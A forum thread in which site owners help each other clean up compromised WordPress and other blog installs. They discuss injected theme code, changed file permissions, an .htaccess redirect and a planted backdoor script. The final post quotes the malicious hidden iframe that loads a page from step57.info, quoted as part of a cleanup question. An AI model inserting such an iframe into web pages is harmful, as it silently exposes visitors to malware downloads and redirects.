may we please have the URL to the site so we can take a better look?
and in the future – it’s best to remove the “install.php” and “upgade.php” files from your server (ONCE YOU’RE DONE WITH THEM). it’s not a complete solution, but i’ve read that it helps.
DannoUK – what’s almost certainly happened is this:
A malicious script has been set loose on the webhosts server.
That script searches for files that it can write to.
Such files are usually theme files.
This is not WP hacking as much a combination of a webhost security and your file permissions.
Download your current theme.
Go through each file in that theme checking for the garbage code.
Delete it all obviously
Upload the files and then change their permissions to 644 and NO higher. No 664 / 666 or anything else.
Check the site works.
If not, check your file editing.
You cannot now edit files online.
NO files on a site should ever be writable and if they are you must know where, why and the risks.
Thanks for all this. Im pretty sure thats exactly what happened Podz – i realised it wasnt just a WordPress prob as a site i have with Coppermine on has also got the same problem. I will try your solutions. Thanks again.
File Editing:
If your host provides a control panel (cPanel for instance) you can access your files through the file manager function. In cPanel find the theme files you wish to edit (can involve a bit of clicking on folders). Click on a file’s name. This will bring up a list of options on the right side of the page. One option is “edit file”. Click on that. A new window will open and you’ll be able to edit it as normal.
BTW, in cPanel you can make copies of your files. I recommend making copies of your theme files.
Does anybody know the name of this script that would be on the server.
I have my own dedicated server and I’d like to make sure the script is off the server.
The only way I’ve been able to deal with them is to make sure all folders are CHMOD to 755 and all files are CHMOD to 644. Otherwise you’ll get them no matter what. Even then I still get them on occasion (I must have missed some files somewhere) and have to go through and redo everything.
It’s a common problem for several sites. Generally they also get into any global files for forum software, which is an easier fix, but still just as much of a pain.
I too have had this problem plague me for months on an off on my server – found this info this morning – and also found the file!
See: http://securityresponse.symantec.com/avcenter/venc/data/php.rstbackdoor.html
I found this virus in a file called news.php by downloading my site again to a backup folder on my PC, then scanning the folder with Norton.
Hope this helps.
I had this problem on an MT site a couple of years ago. I’m trying to rememebr exactly what I did…I *do* know that if you just partially stop it, it’ll just come back over and over again. But once you completely erase it, it usually doesn’t come back (I know the MT blog has never had a problem since.)
I know that the 1×1 pixel iframe was at the bottom of *all* of my posts. I also noticed that my permissions to files had been changed from whatever they were originally to 666 and 777 – if I remember correctly, the files in question were originally 755 and 644. So the first thing I did was go through my cPanel and CHMOD’d all the files back to what they were supposed to be. Then I went into my MT system and republished all of my pages – which got rid of the iframe script at the bottom of every page.
But the BIG thing was that there was actually a script installed on my server. Man, what was the path for that thing? When I found the actual script that did it, I deleted the hell out of it, and it never came back. Prior to figuring out that a script had actually been installed, it kept coming back on me – even the file permissions would continue to change.
Oh yeah, I changed my username/password to log in, as well.
AH! there it is. The hijack attempt would download a torjan to your computer (if you were using IE) and redirect your page to Search.ug. Okay, they had added a line to my .htaccess file, as well – so any 404 would be redirected. I got rid of that, and re-uploaded an old (and clean) .htaccess file. The file I had to delete was called “configs.php” – it was in some subfolder of my root system. Once I fixed the .htaccess, removed “configs.php”, changed username and password, rebuilt my posts/site and checked my CHMOD settings, it has never returned.
(Wow, lotta info there, eh? Sorry for the novel!)
Hope that helps someone out!
I’m a little late to this party, but just found a couple blogs hit by step57. I’m a tech dunce for the most part. Is there a fast way to scan all the files in the blog to see where to remove the offending code:
<iframe width=”1″ height=”1″ src=”http://step57.info/traff/index2.php” style=”border: 0;”></iframe>
Regards,
eric
